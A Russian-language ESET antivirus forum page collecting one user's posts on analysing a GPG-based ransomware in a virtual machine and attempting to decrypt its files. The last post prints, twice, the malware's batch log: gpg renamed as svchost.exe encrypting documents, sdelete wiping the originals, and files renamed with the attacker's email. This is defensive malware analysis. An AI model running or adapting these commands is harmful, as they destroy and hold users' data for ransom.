Vitokhv (Все сообщения пользователя) - Форум технической поддержки ESET NOD32

Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 415

Баллов: 332

Регистрация: 29.05.2010

Размещено 04.10.2014 06:15:03

Получилось расшифровать, только если файл [COLOR=#0000FF]secring.gpg[/COLOR] остается целым и не зашифрованным.
Файл [B]KEY.PRIVATE[/B] он же [COLOR=#2F3192]secring.gpg.gpg[/COLOR] имеет совсем другой [B]ID[/B] вот только откуда он шифруется не понятно.
Сам файл [COLOR=#0000FF]secring.gpg[/COLOR] весит всего ~700 байт, если его найти удаленным, через программы восстановления данных, которые смогут обойти утилиту [COLOR=#FF0000]sdelete.exe[/COLOR] то можно все расшифровать.

Проще наверное файл [B]KEY.PRIVATE[/B] расшифровать, но в каком месте был его ключ неизвестно.

Перейти

Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 415

Баллов: 332

Регистрация: 29.05.2010

Размещено 03.10.2014 18:44:55

Да я хочу расшифровать на виртуалке файлы, не получается, то формат ключа не тот то еще чего...
Вот эти ключи вирус создает сначало в temp, затем в pnupg: pub-key.zip (2.14 КБ)

Изменено: Виктор - 03.10.2014 18:45:34

Перейти

Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 415

Баллов: 332

Регистрация: 29.05.2010

Размещено 03.10.2014 18:06:46

Спасибо, получилось.
Те ключи, что Вы прислали я добавил, вот только как теперь расшифровать... допустим файлы имеют расширения [COLOR=#0000FF]Зима.gpg[/COLOR]
Это нужно сначала ключ [B]pubring.gpg[/B] добавить, который на зараженном ПК, затем к нему привязать ключ [B]secring.gpg[/B] который Вы прислали?

Изменено: Виктор - 03.10.2014 18:07:11

Перейти

Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 415

Баллов: 332

Регистрация: 29.05.2010

Размещено 03.10.2014 17:35:26

Отсюда качаю gnupg-1.4.18: ftp://ftp.gnupg.org/gcrypt/gnupg/gnupg-1.4.18.tar.gz распаковываю до папки, но там нет исполняемых файлов.
Отсюда качаю GPGShell: http://www.jumaros.de/rsoft/download/gpgsh.php

Никак не получается их связать... сама утилита GPGShell если сама себя не видит, то в ней тоже нет исполняемых файлов :(
Только этот мануал есть: http://www.jumaros.de/rsoft/faq.html

[QUOTE]GPGshell: GPGshell tells me something about "GnuPG not found.", but gpg.exe is in my PATH. With the command "set" in a DOS-box I get "PATH=%SystemRoot%\System32;%SystemRoot%". (WinNT only)

You already found the error: Your system does not replace %SystemRoot% with the path of your Windows directory anymore.
This is caused by one of the GnuPG installers, which tries to add gpg.exe to your system's PATH by placing an autoexec.bat with a line like "set path=C:\\Winnt\\GnuPG\\gpg.exe" in your system.
Simply search for this autoexec.bat and remove the line or delete the whole file if it does not contain more, then add your gpg.exe-directory to the PATH via "Control Panel - System - Advanced - Environment Variables".[/QUOTE]

Изменено: Виктор - 03.10.2014 17:41:06

Перейти

Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 415

Баллов: 332

Регистрация: 29.05.2010

Размещено 03.10.2014 16:54:22

Подскажите, что просит утилита?
Вроде просит указать приложение программы версии 1.4.18 но где такую скачать с файлом [B].exe[/B]?

[B]Что делать, если при попытке запуска GPGshell ругается, что не может найти GnuPG?[/B]
Приятная во всем программа GPGshell, действительно, обладает странным свойством делать вид, что не знает, где искать уже установленную GnuPG. Что ж, поможем ей в этом. Решение задачи - внести путь к папке, где установлена программа GnuPG (по умолчанию это c:\Program Files\GNU\GnuPG, но если вы выбрали другую папку при установке GnuPG, используйте ее), в число т.н. "переменных среды". Делается это так. Последовательно выберите ПУСК -> Панель управления -> Система -> Дополнительно -> Переменные среды. Среди системных переменных (обычно их всего несколько штук) найдите переменную Path. Щелкните по кнопке Изменить. В поле Значение переменной есть строка - щелкните в самом конце этой строки, поставьте точку с запятой и путь к GnuPG. Нажимайте последовательно OK во всех окошках. После этой операции GPGshell будет запускаться нормально.
http://regplat.ru/gpg/gpgshell-install.htm

Изменено: Виктор - 03.10.2014 16:58:00

Перейти

Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 415

Баллов: 332

Регистрация: 29.05.2010

Размещено 03.10.2014 15:06:48

На виртуалке этим шифратором все зашифровал через правило запрета: C:\DOCUME~1\\LOCALS~1\Temp\[COLOR=#FF0000]sdelete.exe[/COLOR]
Зашифрованные файлы появились рядом с оригиналами. Папка: C:\Documents and Settings\%USERNAME%\Application Data\[B]gnupg[/B] осталась целой, в ней [B]pubring.gpg[/B] но смысла от него нет, т.к. ключ один. Взял Ваш ключ, он двойной, не знаю как его нашли.
Не получилось привязать GPGShell ([URL=http://www.jumaros.de/rsoft/index.html]gpgsh378.zip[/URL]) к gnupg-1.4.18 версии GPG пришлось ставить gpg4win-2.2.2
С утилитой можно просто добавить ключ и правой мышкой по файлу, расшифровать. Но мне выдает такой ответ:

[CODE]gpg: сбой расшифрования: No secret key[/CODE]

Перейти

Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 415

Баллов: 332

Регистрация: 29.05.2010

Размещено 03.10.2014 11:24:04

Я так понял пытаться расшифровать файлы нет смысла?
Особенно если в закрытом ключе пароль или секретное слово.

[CODE]gpg: сбой расшифрования: No secret key[/CODE]

Изменено: Виктор - 03.10.2014 11:24:52

Перейти

Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 415

Баллов: 332

Регистрация: 29.05.2010

Размещено 03.10.2014 07:11:05

Не дочитал выше пост:D
А про ключ я там вычитал:

результат:
файлы зашифрованы, но ключик то секретный у нас хранится на связке ключей:)

Перейти

Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 415

Баллов: 332

Регистрация: 29.05.2010

Размещено 03.10.2014 07:00:20

Кстати как Вы ключ [COLOR=#0000FF]secring.gpg[/COLOR] целым оставили?
У меня он всегда [B]0 Кб[/B]

Изменено: Виктор - 03.10.2014 07:00:40

Перейти

Защита от вирусных шифровщиков с помощью HIPS

Сообщений: 415

Баллов: 332

Регистрация: 29.05.2010

Размещено 03.10.2014 06:23:15

Вот само зло наверно:

C:\Documents and Settings\%USERNAME%\Local Settings\Temp\[COLOR=#FF0000]j13544q130b.js[/COLOR] (рандомный, скачивает с интернета исходники вируса, через прокси тунель)
C:\Documents and Settings\%USERNAME%\Local Settings\Temp\[COLOR=#FF0000]keyb.cmd[/COLOR]
C:\Documents and Settings\%USERNAME%\Local Settings\Temp\[COLOR=#FF0000]bitdata.cmd[/COLOR]

Скрытый текст
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" "excel.xls.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" "excel4.xls.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" "winword.doc.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" "winword2.doc.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" "excel.xls.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" "excel4.xls.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" "winword.doc.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" "winword2.doc.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" "‚®¤плҐ «Ё«ЁЁ.jpg.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" "ѓ®«гЎлҐ е®«¬л.jpg.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" "‡ Є в.jpg.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" "‡Ё¬ .jpg.keybtc@gmail_com" svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" & move /y "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip.gpg" "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" & rename "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" "‘Є -Є®ЇЁЁ бзҐв®ў.zip.keybtc@gmail_com"

Скрытый текст

svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\excel.xls" "excel.xls.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\excel4.xls" "excel4.xls.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\winword.doc" "winword.doc.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" & move /y "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc.gpg" "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" & rename "C:\Documents and Settings\Default User\˜ Ў«®л\winword2.doc" "winword2.doc.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\excel.xls" "excel.xls.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\excel4.xls" "excel4.xls.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\winword.doc" "winword.doc.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" & move /y "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc.gpg" "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" & rename "C:\Documents and Settings\Virlab\˜ Ў«®л\winword2.doc" "winword2.doc.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‚®¤плҐ «Ё«ЁЁ.jpg" "‚®¤плҐ «Ё«ЁЁ.jpg.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\ѓ®«гЎлҐ е®«¬л.jpg" "ѓ®«гЎлҐ е®«¬л.jpg.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡ Є в.jpg" "‡ Є в.jpg.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" & move /y "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg.gpg" "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" & rename "C:\Documents and Settings\All Users\„®Єг¬Ґвл\Њ®Ё аЁбгЄЁ\ЋЎа §жл аЁбгЄ®ў\‡Ё¬ .jpg" "‡Ё¬ .jpg.keybtc@gmail_com"
svchost.exe -r genesis --yes -q --no-verbose --trust-model always -e "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" && if 1==0 sdelete.exe /accepteula -p 1 -q "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" & move /y "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip.gpg" "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" & rename "C:\Documents and Settings\Virlab\ђ Ў®зЁ© бв®«\‘Є -Є®ЇЁЁ бзҐв®ў.zip" "‘Є -Є®ЇЁЁ бзҐв®ў.zip.keybtc@gmail_com"

Изменено: Виктор - 03.10.2014 07:32:49

Перейти